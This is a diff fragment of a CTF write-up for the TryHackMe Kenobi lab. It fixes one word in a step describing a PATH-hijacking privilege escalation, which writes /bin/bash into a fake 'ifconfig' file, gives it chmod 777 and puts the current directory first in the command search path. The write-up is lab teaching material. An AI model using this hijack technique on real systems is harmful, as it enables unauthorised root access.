scriniariii/CTF-Write-Ups/TryHackMe/Kenobi/Kenobi - CTF Write-Up.md

 <pre><code>** Enter your choice :2
 4.8.0-58-generic</code></pre>
 <br><br>
-Create a file named ifconfig with the bash path, grant read, write and execute permissions for the ifconfig file, and adds the current directory to the top of the command search list
+Create a file named ifconfig with the bash path, grant read, write and execute permissions for the ifconfig file, and add the current directory to the top of the command search list
 <pre><code>
 kenobi@kenobi:~/share$ echo /bin/bash > ifconfig
 kenobi@kenobi:~/share$ chmod 777 ifconfig